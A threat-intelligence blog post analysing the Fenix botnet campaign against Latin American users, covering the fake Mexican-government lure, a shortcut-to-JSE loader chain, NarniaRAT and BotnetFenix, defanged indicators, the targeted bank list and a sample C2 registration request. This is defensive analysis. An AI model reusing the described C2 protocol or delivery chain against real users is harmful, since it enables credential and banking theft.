Fenix Botnet Targeting LATAM Users

Adversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters and Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.

We have discovered some of the most dangerous threats and nation state attacks in our space – including the Kaseya MSP breach and the more_eggs malware.

Our Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced Threat Analytics driven by our Threat Response Unit – the TRU team.

In TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We outline how we responded to the confirmed threat and what recommendations we have going forward.

Here’s the latest from our TRU Team…

What did we find?

In January 2024, the Threat Response Unit (TRU) identified a campaign targeting Latin American users. Victims are deceived into downloading a malicious zip archive under the guise of a legitimate tool from a website masquerading as the Government of Mexico.

Upon successful execution, the payload installs a Remote Access Trojan (RAT) with infostealing capabilities and enlists the compromised machine into a botnet.

This campaign is particularly noteworthy for its stealer/banker functionality, which targets a specific list of Latin American financial institutions. The RAT deployed by the threat actors behind Fenix Botnet exhibits capabilities designed to intercept and steal banking credentials, directly impacting the financial security of individuals and corporations alike.

The initial infection started when the user visited the malicious page (Figure 1).

Figure 1: Malicious website

After entering the prompted data (Figure 2), the user gets redirected to the pages shown in Figures 3-4.

Figure 2: Prompt to enter the data, Text translated to English.
Figure 3: Redirect page 1. Text translated to English.
Figure 4: Redirected page 2

After clicking on the instructed button in Figure 4, the user is served with a ZIP archive named “AvisodePrivacidadVirtual.zip” (MD5: 95260c9385dbb1f52004e7ab5aceda96); the hash doesn’t change each time of the new download.

The contents of the ZIP archive are shown in Figure 5. The archive contains the text file with instructions on launching the Internet Shortcut file. Internet Shortcuts can be crafted to retrieve malicious files from the Internet network share.

Figure 5 shows that the .url shortcut file contains an embedded URL (172.86.75[.]130vWarfc.jse). The shortcut eventually retrieves the “rfc.jse” file (MD5: a7fadf0050d4d0b2cefd808e16dfde69).

Figure 5: Contents of the ZIP archive, translation added.

The deobfuscated JSE is shown in Figure 6. It retrieves another payload named “7i1.xls”. The contents of the payload are shown in Figure 7. The payload retrieves the .NET loader named “7i1.xls” (MD5: 7f739c189c96d42bff65e8b7b7c42237) that injects the shellcode into AuthHost.exe via QueueUserAPC process injection as shown in Figure 7.

Upon testing, we noticed that shellcode retrieves either “narnia.xls” file from the server, which we dubbed as NarniaRAT based on the filename (app.quantumservice[.]lat/2XpbhUdaA4/narnia.xls) (MD5: 43f6c3f92a025d12de4c4f14afa5d098) or BotnetFenix payload (MD5: cfb7d71a73585052041f8c9a057c83c6) from app.quantumservice.lat/2XpbhUdaA4/vc67j2[.]xls, as shown in Figure 8.

Figure 6: Deobfuscated JSE file
Figure 7: Process injection via QueueUserAPC
Figure 8: Shellcode downloading the payload

NarniaRAT contains the exfiltration, screen capture, keylogging, and banking stealing functionalities.

The RAT exfiltrates files from Desktop, Documents, Windows, and %USERPROFILE% folders. The data exfiltration functionality is shown below.

Figure 9: Data exfiltration

The function in Figure 10 retrieves the computer information, including private and public IP addresses, country, antivirus products, system uptime information, etc.

Figure 10: Gather computer information

NarniaRAT monitors the infected machine for browser processes such as Chrome, Firefox, Edge, Internet Explorer, Opera, Brave and Safari (Figure 11).

Figure 11: Browser process monitoring

It’s worth mentioning that NarniaRAT uses the “Get WatchList” command to fetch the list of banking names from the C2 server (45.77.71[.]28), for example. The specificity of this operation is noteworthy, as the fetched list comprises banking entities predominantly operating within Latin American countries.

The list of fetched banking information:

Banamex|BancaNet Empresarial | Citibanamex.com|BancaNet | Citibanamex.com|HSBC Personas - Productos Y Servicios - HSBC México|HSBCnet | HSBC México|Iniciar Sesión | HSBCnet|Empresas y Gobierno | Empresas | BBVA México|Bienvenidos a la Banca en Línea | BBVA Mexico|Banorte | El Banco Fuerte de México|Empresas y Corporativos|Somos el banco de creadores | Banregio|Banca electrónica empresarial | Empresas | Banregio|BBVA Net Cash|Santander México | Se parte de la banca electrónica| Banca de Empresas | Productos financieros empresariales Santander|SuperNet Santander | la banca electrónica por internet|BanBajío | Tu Banco de Confianza |Bajionet para Empresas, La Banca Electrónica de BanBajío|Bajionet|Banca | Servicios Financieros | Grupo Financiero Mifel|Banca MIFEL|Scotiabank México | Tú  decides, Nosotros te Asesoramos|Inicia sesión en ScotiaWeb - ScotiaWeb|ScotiaWeb Empresas | Scotia|Ve por más- Banco|Bansí - Un Banco Entre Personas|El banco que quiero | BanCoppel.com|Banca Empresarial BanCoppel | BanCoppel.com|Banco Azteca, tu banca en línea| Sueas, Decides, Logras|Banca en línea Empresarial | Banco Azteca|Grupo Financiero Inbursa|Inbursa | Banca en Línea| nea Empresarial

BotnetFenix is written in Rust. The botnet has the ability to download and execute remote tasks, including reflecting code loading, running PowerShell commands, and downloading a stealer (steal.crypt), as shown in Figure 12.

At the moment of writing this blog, steal.crypt (MD5: 594804aa21887ee9d7b1b888f482d60c) seems to contain only a reflective DLL loader component.

Figure 12: Downloading the

BotnetFenix also has the capability to decrypt the retrieved payloads from C2 servers using a simple XOR algorithm and the hardcoded key. The C2 servers are hardcoded into the botnet payloads.

Below is an example of the POST request to register the newly infected machine.

POST /2XpbhUdaA4/post.php HTTP/1.1
Accept: text/html, text/strings
content-type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Host: app.quantumservice[.]lat
Content-Length: 59
Cache-Control: no-cache
action=add_register&uuid={uuid_value}&os={os_value} &is_admin{1 or 0 for True or False}=&av={antivirus}&system_type{system_type_value}= &desktopname={desktop_name}

What did we do?

Our team of 24/7 SOC Cyber Analysts isolated the system and performed additional investigation before alerting the customer.

What can you learn from this TRU Positive?

  • The importance of recognizing the initial vectors of infection, such as visiting malicious websites. This case underscores the need for continuous awareness and education on the dangers of navigating to untrusted sites.
  • The use of process injection to execute malicious payloads covertly within legitimate processes. This technique underscores the need for behavioral detection mechanisms to identify and mitigate such evasion techniques.
  • The example demonstrates how malware communicates with a C2 server to download additional payloads, such as NarniaRAT and BotnetFenix. It emphasizes the importance of monitoring network traffic for unusual patterns that could indicate C2 communication.
  • The ability of BotnetFenix to download and execute tasks, including reflective code loading and NarniaRAT’s functionalities, such as data exfiltration, screen capture, keylogging, and banking information theft, illustrate the diverse capabilities of BotnetFenix threat actors and the severe implications for privacy and data security.

Recommendations from our Threat Response Unit (TRU):

Detection Rules

You can access the detection rules here
and here.

Indicators of Compromise

You can access the indicators of compromise here.

References

Source: Original Post